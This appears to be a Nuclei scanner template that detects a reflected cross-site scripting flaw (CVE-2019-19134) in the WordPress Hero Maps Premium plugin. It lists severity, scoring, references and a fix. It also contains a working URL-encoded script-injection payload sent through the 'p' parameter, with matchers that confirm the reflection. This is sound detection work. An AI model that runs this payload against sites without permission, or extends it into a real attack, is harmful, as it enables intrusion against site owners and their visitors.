id: CVE-2019-19134 info: name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting author: daffainfo severity: medium description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter. remediation: | Update to the latest version of the WordPress Hero Maps Premium plugin (>=2.2.2) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php - https://heroplugins.com/product/maps/ - https://heroplugins.com/changelogs/hmaps/changelog.txt - https://nvd.nist.gov/vuln/detail/CVE-2019-19134 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.00203 epss-percentile: 0.58143 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: heroplugins product: hero_maps_premium framework: wordpress tags: wpscan,cve,cve2019,wordpress,xss,wp-plugin,maps http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - 'foo">' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100ea58bbff87be160b4e6e86f1e813e3727e9ad647c2320a09c95a4a154e3e3e36022100ae8bb2bfdd810767368344bf4f345665a4e4b53d38d07e7fecd5d500f2621e56:922c64590222798bb761d5b6d8e72950